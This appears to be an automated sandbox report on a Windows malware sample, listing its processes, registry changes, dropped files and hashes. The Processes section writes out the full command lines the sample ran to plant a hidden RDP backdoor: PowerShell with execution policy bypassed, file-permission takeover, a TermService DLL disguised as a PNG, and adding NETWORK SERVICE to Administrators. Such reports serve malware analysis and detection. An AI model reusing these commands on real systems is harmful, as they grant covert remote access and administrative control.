N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\rdpclip.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\rfxvmt.dll C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\shellbrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3332 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3332 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3332 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3636 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3636 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3636 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 5092 wrote to memory of 1480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 1480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 1480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2848 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2848 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2848 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 4684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 5092 wrote to memory of 4684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 5092 wrote to memory of 4684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 5092 wrote to memory of 2148 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2148 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2148 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 4508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 4508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 4508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 4084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 4084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 4084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\net.exe
PID 5092 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\net.exe
PID 5092 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\net.exe
PID 2340 wrote to memory of 3068 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2340 wrote to memory of 3068 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2340 wrote to memory of 3068 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5092 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5092 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5092 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5096 wrote to memory of 3968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5096 wrote to memory of 3968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5096 wrote to memory of 3968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3968 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8BE.tmp" "c:\Users\Admin\AppData\Local\Temp\hkebzj0b\CSCB48E594DDE1644258116C5674D749743.TMP"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

memory/3332-0-0x00000000002E0000-0x00000000006EB000-memory.dmp

memory/3332-1-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/3332-2-0x0000000005880000-0x0000000005890000-memory.dmp

memory/3332-3-0x0000000005CA0000-0x00000000060A4000-memory.dmp

memory/3332-4-0x0000000005880000-0x0000000005890000-memory.dmp

memory/3332-5-0x0000000006650000-0x0000000006BF4000-memory.dmp

memory/3332-6-0x00000000062A0000-0x0000000006332000-memory.dmp

memory/3332-7-0x0000000005880000-0x0000000005890000-memory.dmp

memory/3332-8-0x0000000006460000-0x000000000646A000-memory.dmp

memory/3332-9-0x0000000007A70000-0x0000000007AD6000-memory.dmp

memory/5092-12-0x00000000029A0000-0x00000000029D6000-memory.dmp

memory/5092-13-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/5092-14-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

memory/5092-15-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

memory/5092-16-0x0000000005310000-0x0000000005938000-memory.dmp

memory/5092-17-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

memory/5092-18-0x0000000005150000-0x00000000051B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3eop0myz.x5o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5092-28-0x00000000059C0000-0x0000000005D14000-memory.dmp

memory/5092-29-0x0000000005F80000-0x0000000005F9E000-memory.dmp

memory/5092-30-0x0000000005FB0000-0x0000000005FFC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/5092-32-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

memory/5092-33-0x00000000075C0000-0x0000000007C3A000-memory.dmp

memory/5092-34-0x00000000064E0000-0x00000000064FA000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.cmdline

MD5 947abf591dbf321409f38aeb2a3a3072
SHA1 9ac4db381c0a1c257d4886bfbc630c7e8469be82
SHA256 a888796c34418732d33663846092d16d9940d32d4f5ad2f2183024147f8be8db
SHA512 87aeb78d21518280d1c012d9bc115eed592e44025a8843fc745a4d11efee76ea35f26081240a2a72cf2e3d88f4eb9b148e1a06489ed2c82c41ca371b96c8826c

\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\CSCB48E594DDE1644258116C5674D749743.TMP

MD5 216a7f213b3840a471c20b967436ccc5
SHA1 cc95009d8a4be42486538345d9d33037c15c48ab
SHA256 ceb2031e43595541e82fd58c550b239b3203de44aaf02d8056b64ffbb65aa64c
SHA512 9c99222ec93600afbc555130c993a2ad4d6664cf1359b2be24d1d9515a823b2ec4af640c37dca036f2510c06fdbd85a64154d6dc70b73fd678de4bc07d9e7d38

C:\Users\Admin\AppData\Local\Temp\RESC8BE.tmp

MD5 e2ff148a195602967a078ffa782d563e
SHA1 e6f8436b141fd4a67b835ac01d4db9ac91430d87
SHA256 27145f5a87f8447c15d9e5a4d1febceb56da0933d28fa8f233262dc116065374
SHA512 eb84de59250991956af5d1fd5e52c6587040db967493e9f3c84ef98161055758ec1607ff24fa8bf36208dd1a25aa4076ebb63e5a73ae863c19bed9d0ee3cfb33

C:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.dll

MD5 09102fe0b7e6302f160ab0fcde307c4b
SHA1 2b7a7bca1a5ac90613abad1941aa3d25c5288831
SHA256 fc08a3e14a7b6f71ca88cc749905934e63eb813c22d765aa6a3c84b61a75cfeb
SHA512 5cc111e0ee3b0f7f841456cf26f2593fdf5dad705c61829af2c775a3fd5e5b27345d911f64aac2d156be3942eede99512248e6f5aab9d07e6e3b2ce71c3f6ec4

memory/5092-47-0x0000000006550000-0x0000000006558000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 841cc93778b4ec353d0075d717b90df4
SHA1 287f652b7be199d127aab4655055654a6ea2bed6
SHA256 77f2e15c057346682081eae41389c9d91ba710c2f91107a9c59543c71cf6cad1
SHA512 a98053ebe4279d8b312a27f634ca2a9b4d929e15f8d27bdb2e89706a9fa967035e58a5d5cec2be0e5ea763b8c278884863f91d8ca270d4a30a20c51d00b72541

memory/5092-50-0x0000000007250000-0x000000000727C000-memory.dmp

memory/1480-51-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/1480-52-0x0000000002A80000-0x0000000002A90000-memory.dmp

memory/3332-53-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/3332-63-0x0000000005880000-0x0000000005890000-memory.dmp

memory/3332-64-0x0000000005880000-0x0000000005890000-memory.dmp

memory/3332-65-0x0000000005880000-0x0000000005890000-memory.dmp

memory/1480-66-0x0000000006B40000-0x0000000006B72000-memory.dmp

memory/1480-67-0x000000006FDD0000-0x000000006FE1C000-memory.dmp

memory/1480-68-0x0000000070440000-0x0000000070794000-memory.dmp

memory/1480-78-0x0000000006A80000-0x0000000006A9E000-memory.dmp

memory/1480-79-0x0000000006D80000-0x0000000006E23000-memory.dmp

memory/1480-80-0x0000000006F10000-0x0000000006F1A000-memory.dmp

memory/1480-81-0x0000000007150000-0x00000000071E6000-memory.dmp

memory/1480-82-0x0000000007070000-0x0000000007081000-memory.dmp

memory/1480-83-0x00000000070B0000-0x00000000070BE000-memory.dmp

memory/1480-84-0x00000000070C0000-0x00000000070D4000-memory.dmp

memory/3332-85-0x0000000005880000-0x0000000005890000-memory.dmp

memory/1480-86-0x0000000007100000-0x000000000711A000-memory.dmp

memory/1480-87-0x00000000070F0000-0x00000000070F8000-memory.dmp

memory/1480-88-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/5092-89-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/2848-90-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/2848-91-0x0000000004E00000-0x0000000004E10000-memory.dmp

memory/5092-92-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

memory/2848-93-0x0000000004E00000-0x0000000004E10000-memory.dmp

memory/5092-103-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

memory/5092-105-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

memory/2848-106-0x000000006FDD0000-0x000000006FE1C000-memory.dmp

memory/2848-107-0x0000000070440000-0x0000000070794000-memory.dmp

memory/2848-117-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/2332-118-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/2332-119-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/2332-120-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/2332-130-0x0000000004F10000-0x0000000004F20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 e2e6bbdcc5cb2b2a8e58e62380cbdeeb
SHA1 fd3b0bbf8d08573d022e54ceb111e4dfe93ff752
SHA256 2cf90543f0e785093db02f3ce60471d639ec8e5030a2ea0d70187ce55c248cf2
SHA512 82ff827ccb3eb01f00713dfcf4d2ef8107c86d206698a366293bb723e36d9a20dba44c818d40e79824fd72c76987e71d69565a3079bccaaa0626d64a13014317

memory/2332-132-0x000000007F4E0000-0x000000007F4F0000-memory.dmp

memory/2332-133-0x000000006FDD0000-0x000000006FE1C000-memory.dmp

memory/2332-134-0x0000000070440000-0x0000000070794000-memory.dmp

memory/2332-144-0x0000000074830000-0x0000000074FE0000-memory.dmp

memory/5092-145-0x0000000007510000-0x0000000007532000-memory.dmp

C:\Windows\SysWOW64\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7